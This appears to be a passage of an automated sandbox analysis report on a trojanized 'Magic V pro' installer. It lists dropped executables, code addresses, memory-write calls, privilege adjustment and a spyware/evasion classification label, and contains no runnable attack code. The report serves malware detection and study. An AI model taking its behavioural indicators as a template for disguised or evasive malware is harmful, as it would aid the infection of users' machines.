Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB3BE3 NtWriteVirtualMemory,NtWriteVirtualMemory,		18_2_03FB3BE3
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB3BD6 NtWriteVirtualMemory,NtWriteVirtualMemory,		18_2_03FB3BD6

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe

Code function: 11_2_00DA8752: __EH_prolog,GetFileInformationByHandle,DeviceIoControl,memcpy,

11_2_00DA8752

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E1ADF0	11_2_00E1ADF0
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E06D56	11_2_00E06D56
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E0CD3B	11_2_00E0CD3B
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E220F0	11_2_00E220F0
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E32040	11_2_00E32040
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E24020	11_2_00E24020
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E16180	11_2_00E16180
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E34170	11_2_00E34170
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E36150	11_2_00E36150
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DBA11A	11_2_00DBA11A
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E38110	11_2_00E38110
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E302C0	11_2_00E302C0
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E102BA	11_2_00E102BA
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E24270	11_2_00E24270
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E3A3E0	11_2_00E3A3E0
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DF237F	11_2_00DF237F
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E2A4A0	11_2_00E2A4A0
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DBC417	11_2_00DBC417
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E3C410	11_2_00E3C410
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DBC5E6	11_2_00DBC5E6
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E1A590	11_2_00E1A590
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E1C530	11_2_00E1C530
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DFC50E	11_2_00DFC50E
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E24660	11_2_00E24660
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E18630	11_2_00E18630
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E2A750	11_2_00E2A750
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E2A8B0	11_2_00E2A8B0
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E1E860	11_2_00E1E860
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E28830	11_2_00E28830
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DBE991	11_2_00DBE991
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E28930	11_2_00E28930
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E42900	11_2_00E42900
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E44910	11_2_00E44910
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E44AE9	11_2_00E44AE9
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E42AB0	11_2_00E42AB0
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E48A20	11_2_00E48A20
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E48BE0	11_2_00E48BE0
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E40B90	11_2_00E40B90
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E02B00	11_2_00E02B00
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DEECF6	11_2_00DEECF6
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DE8C03	11_2_00DE8C03
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E2AE20	11_2_00E2AE20
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E40FB0	11_2_00E40FB0
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E3AF20	11_2_00E3AF20
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E330E8	11_2_00E330E8
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E1F0D0	11_2_00E1F0D0
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E43020	11_2_00E43020
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E1D010	11_2_00E1D010
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DFB272	11_2_00DFB272
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E19370	11_2_00E19370
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E21310	11_2_00E21310
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E3B490	11_2_00E3B490
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DA1598	11_2_00DA1598
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E156A0	11_2_00E156A0
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E29690	11_2_00E29690
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E3F640	11_2_00E3F640
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DF5775	11_2_00DF5775
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E478C0	11_2_00E478C0
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E37AE0	11_2_00E37AE0
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DA5A88	11_2_00DA5A88
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E29A80	11_2_00E29A80
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DE9A5D	11_2_00DE9A5D
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DA1A67	11_2_00DA1A67
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E21A20	11_2_00E21A20
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E33A20	11_2_00E33A20
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E27B30	11_2_00E27B30
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E41CF0	11_2_00E41CF0
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DA9C00	11_2_00DA9C00
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E33D40	11_2_00E33D40
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DF9E89	11_2_00DF9E89
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E39E20	11_2_00E39E20
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E31FC0	11_2_00E31FC0
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00E43F70	11_2_00E43F70
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DCFF7C	11_2_00DCFF7C
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00410990	18_2_00410990
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00421260	18_2_00421260
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0040BA10	18_2_0040BA10
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0040E360	18_2_0040E360
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0041ABA1	18_2_0041ABA1
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0041B4A4	18_2_0041B4A4
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00421D10	18_2_00421D10
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004475C0	18_2_004475C0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0041DD90	18_2_0041DD90
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004215A0	18_2_004215A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0043F640	18_2_0043F640
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00442710	18_2_00442710
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00447FB0	18_2_00447FB0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00401040	18_2_00401040
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00446040	18_2_00446040
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0041A855	18_2_0041A855
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00446810	18_2_00446810
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00410020	18_2_00410020
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00432830	18_2_00432830
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004328D0	18_2_004328D0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004298F0	18_2_004298F0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004388A0	18_2_004388A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004400A0	18_2_004400A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0042F156	18_2_0042F156
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00436162	18_2_00436162
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00446170	18_2_00446170
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00443100	18_2_00443100
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0043290E	18_2_0043290E
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00444115	18_2_00444115
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00413913	18_2_00413913
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0043291D	18_2_0043291D
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004089D0	18_2_004089D0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004349E0	18_2_004349E0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0040A1A0	18_2_0040A1A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004201AB	18_2_004201AB
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004381BB	18_2_004381BB
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0040CA40	18_2_0040CA40
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0043AA40	18_2_0043AA40
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00447250	18_2_00447250
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00445A52	18_2_00445A52
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00429210	18_2_00429210
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00446230	18_2_00446230
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00433ADD	18_2_00433ADD
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0042C2E0	18_2_0042C2E0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00446AE0	18_2_00446AE0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004462F0	18_2_004462F0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00440A80	18_2_00440A80
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00402AB0	18_2_00402AB0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00421AB0	18_2_00421AB0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0041535E	18_2_0041535E
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0040EB00	18_2_0040EB00
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0041CB11	18_2_0041CB11
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0043EB10	18_2_0043EB10
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0043F320	18_2_0043F320
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0043C338	18_2_0043C338
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004093C0	18_2_004093C0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004503DE	18_2_004503DE
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004403E0	18_2_004403E0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004363F8	18_2_004363F8
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00426380	18_2_00426380
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00433396	18_2_00433396
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00429BA0	18_2_00429BA0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0041FBB0	18_2_0041FBB0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0042C3BD	18_2_0042C3BD
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00438C40	18_2_00438C40
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00424C60	18_2_00424C60
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004034C0	18_2_004034C0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00437CC1	18_2_00437CC1
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00407CF0	18_2_00407CF0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0043ACF0	18_2_0043ACF0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0042D48E	18_2_0042D48E
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0043D4B2	18_2_0043D4B2
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00429D50	18_2_00429D50
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0043ED70	18_2_0043ED70
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0042CD16	18_2_0042CD16
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00429D2E	18_2_00429D2E
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00419D3C	18_2_00419D3C
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0043DD8B	18_2_0043DD8B
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0040C5A0	18_2_0040C5A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004235B0	18_2_004235B0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00408E40	18_2_00408E40
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0041C65D	18_2_0041C65D
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00403E60	18_2_00403E60
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00415E70	18_2_00415E70
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00435E03	18_2_00435E03
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00431600	18_2_00431600
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00411605	18_2_00411605
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004336C2	18_2_004336C2
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00431ED0	18_2_00431ED0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0043C6D0	18_2_0043C6D0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00446EE0	18_2_00446EE0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00439EF4	18_2_00439EF4
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00425E80	18_2_00425E80
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004206A0	18_2_004206A0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0041BF43	18_2_0041BF43
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00427F6B	18_2_00427F6B
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00420F00	18_2_00420F00
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0042BF10	18_2_0042BF10
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00443F22	18_2_00443F22
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0042B7C8	18_2_0042B7C8
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00418FD7	18_2_00418FD7
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_004127E0	18_2_004127E0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_00411FF7	18_2_00411FF7
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_0041B7A5	18_2_0041B7A5
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FC1AC0	18_2_03FC1AC0
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FC1150	18_2_03FC1150
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FCD729	18_2_03FCD729
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FBF670	18_2_03FBF670
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: 18_2_03FB7E00	18_2_03FB7E00

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\is-7UHOC.tmp\_isetup\_setup64.tmp 388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95

Enables security privileges

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe

Process token adjusted: Security

Jump to behavior

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: String function: 00DA2A44 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: String function: 00DA1E30 appears 104 times
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: String function: 00DA1DFC appears 37 times
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: String function: 00E450F0 appears 744 times
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: String function: 00418F30 appears 102 times
Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe	Code function: String function: 0040B190 appears 53 times

PE file contains executable resources (Code or Archives)

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.7.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.7.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Sample file is different than original file name gathered from version info

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1275847273.0000000002520000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000000.1271187599.00000000004B8000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFileName vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1358117029.0000000002388000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1276579889.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000007.00000003.1704366229.0000000002298000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamekernel32j% vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Binary or memory string: OriginalFileName vs Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Uses 32bit PE files

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: willrandom.exe.11.dr

Static PE information: Section: pb ZLIB complexity 1.021484375

Source: classification engine

Classification label: mal74.troj.spyw.evad.winEXE@63/26@50/9

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DB458B __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		11_2_00DB458B
Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe	Code function: 11_2_00DA9749 _fileno,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		11_2_00DA9749

Source: C:\Users\user\AppData\Local\Temp\is-GTB58.tmp\idp.exe

Code function: 11_2_00DA96A5 DeviceIoControl,GetDiskFreeSpaceExW,GetDiskFreeSpaceW,

11_2_00DA96A5

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Code function: 18_2_0043F640 CoCreateInstance,#2,CoSetProxyBlanket,#2,#2,#8,#9,#6,#6,#6,#6,GetVolumeInformationW,

18_2_0043F640

Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp

File created: C:\Users\user\AppData\Local\Programs

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2812:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2112:120:WilError_03

Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe

File created: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp

Jump to behavior

Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TFCVM.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-E1ELN.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
